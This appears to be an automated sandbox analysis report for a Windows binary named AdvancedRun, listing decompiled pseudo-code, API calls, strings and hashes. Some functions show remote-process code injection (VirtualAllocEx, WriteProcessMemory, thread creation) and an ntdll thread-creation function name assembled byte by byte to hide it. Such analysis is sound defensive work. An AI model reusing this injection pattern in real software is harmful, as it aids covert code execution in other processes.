				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
memset.MSVCRT ref: 0040A4B3
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0

Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1

GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
CloseHandle.KERNEL32(00000000), ref: 0040A648
memset.MSVCRT ref: 0040A66E
ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
FreeLibrary.KERNEL32(?), ref: 0040A6DC
GetLastError.KERNEL32 ref: 0040A6E4
GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1

Strings

GetLastError, xrefs: 0040A4FE
D, xrefs: 0040A528
kernel32.dll, xrefs: 0040A4BB
CreateProcessW, xrefs: 0040A4DD

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
String ID: CreateProcessW$D$GetLastError$kernel32.dll
API String ID: 1572607441-20550370
Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}

APIs

GetDlgItem.USER32 ref: 004010EB
ChildWindowFromPoint.USER32 ref: 004010FD
GetDlgItem.USER32 ref: 00401133
ChildWindowFromPoint.USER32 ref: 00401140
GetDlgItem.USER32 ref: 0040116E
ChildWindowFromPoint.USER32 ref: 00401180
GetModuleHandleW.KERNEL32(00000000,?,?), ref: 00401189
LoadCursorW.USER32(00000000,00000067), ref: 00401192
SetCursor.USER32(00000000,?,?), ref: 00401199
GetDlgItem.USER32 ref: 004011BA
ChildWindowFromPoint.USER32 ref: 004011C7
GetDlgItem.USER32 ref: 004011E1
SetBkMode.GDI32(?,00000001), ref: 004011ED
SetTextColor.GDI32(?,00C00000), ref: 004011FB
GetSysColorBrush.USER32(0000000F), ref: 00401203
GetDlgItem.USER32 ref: 00401224
EndDialog.USER32(?,?), ref: 00401259
DeleteObject.GDI32(?), ref: 00401265
GetDlgItem.USER32 ref: 0040128A
ShowWindow.USER32(00000000), ref: 00401293
GetDlgItem.USER32 ref: 0040129F
ShowWindow.USER32(00000000), ref: 004012A2
SetDlgItemTextW.USER32 ref: 004012B3
SetWindowTextW.USER32(?,AdvancedRun), ref: 004012C1
SetDlgItemTextW.USER32 ref: 004012D9
SetDlgItemTextW.USER32 ref: 004012EA

Strings

AdvancedRun, xrefs: 004012B9

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
String ID: AdvancedRun
API String ID: 829165378-481304740
Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18

Uniqueness

Uniqueness Score: -1.00%

Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21

Strings

NtQueryObject, xrefs: 00408EA5
NtUnloadDriver, xrefs: 00408E6F
NtQuerySymbolicLinkObject, xrefs: 00408E93
NtOpenThread, xrefs: 00408EB7
NtLoadDriver, xrefs: 00408E5D
NtOpenSymbolicLinkObject, xrefs: 00408E81
NtResumeThread, xrefs: 00408EFF
NtClose, xrefs: 00408EC9
NtQueryInformationThread, xrefs: 00408EDB
NtQuerySystemInformation, xrefs: 00408E50
ntdll.dll, xrefs: 00408E3F
NtSuspendThread, xrefs: 00408EED
NtTerminateThread, xrefs: 00408F11

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
API String ID: 667068680-4280973841
Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C

Uniqueness

Uniqueness Score: -1.00%

Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216
windowCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8;
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc;
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}

APIs

EndDialog.USER32(?,?), ref: 00408B20
GetDlgItem.USER32 ref: 00408B38
SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00408B56
SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00408B62
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00408B6A
memset.MSVCRT ref: 00408B91
memset.MSVCRT ref: 00408BB3
memset.MSVCRT ref: 00408BCC
memset.MSVCRT ref: 00408BE0
memset.MSVCRT ref: 00408BFA
memset.MSVCRT ref: 00408C12
GetCurrentProcess.KERNEL32 ref: 00408C1A
ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 00408C3D
ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00408C6F
memset.MSVCRT ref: 00408CC2
GetCurrentProcessId.KERNEL32 ref: 00408CD0
memcpy.MSVCRT ref: 00408CFE
wcscpy.MSVCRT ref: 00408D21
_snwprintf.MSVCRT ref: 00408D90
SetDlgItemTextW.USER32 ref: 00408DA8
GetDlgItem.USER32 ref: 00408DB2
SetFocus.USER32(00000000), ref: 00408DB9

Strings

Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
{Unknown}, xrefs: 00408BA5

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
API String ID: 4111938811-1819279800
Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68

Uniqueness

Uniqueness Score: -1.00%

Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

APIs

GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
??2@YAPAXI@Z.MSVCRT ref: 0040B07E
GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
_snwprintf.MSVCRT ref: 0040B0FE
wcscpy.MSVCRT ref: 0040B128
??3@YAXPAX@Z.MSVCRT ref: 0040B1D8

Strings

FileDescription, xrefs: 0040B141
ProductName, xrefs: 0040B12F
040904E4, xrefs: 0040B122
FileVersion, xrefs: 0040B156
ProductVersion, xrefs: 0040B16B
CompanyName, xrefs: 0040B180
OriginalFileName, xrefs: 0040B1BF
%4.4X%4.4X, xrefs: 0040B0F3
\VarFileInfo\Translation, xrefs: 0040B0D8
LegalCopyright, xrefs: 0040B1AA
InternalName, xrefs: 0040B195

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
API String ID: 1223191525-1542517562
Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
GetProcAddress.KERNEL32(00000000,?), ref: 0040A263

Strings

N, xrefs: 0040A21F
C, xrefs: 0040A237
t, xrefs: 0040A22F
e, xrefs: 0040A227
t, xrefs: 0040A223
r, xrefs: 0040A23B
h, xrefs: 0040A25B
e, xrefs: 0040A24F
a, xrefs: 0040A22B
E, xrefs: 0040A247
r, xrefs: 0040A243
ntdll.dll, xrefs: 0040A1FA
T, xrefs: 0040A257
a, xrefs: 0040A253
e, xrefs: 0040A233
d, xrefs: 0040A23F
x, xrefs: 0040A24B

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
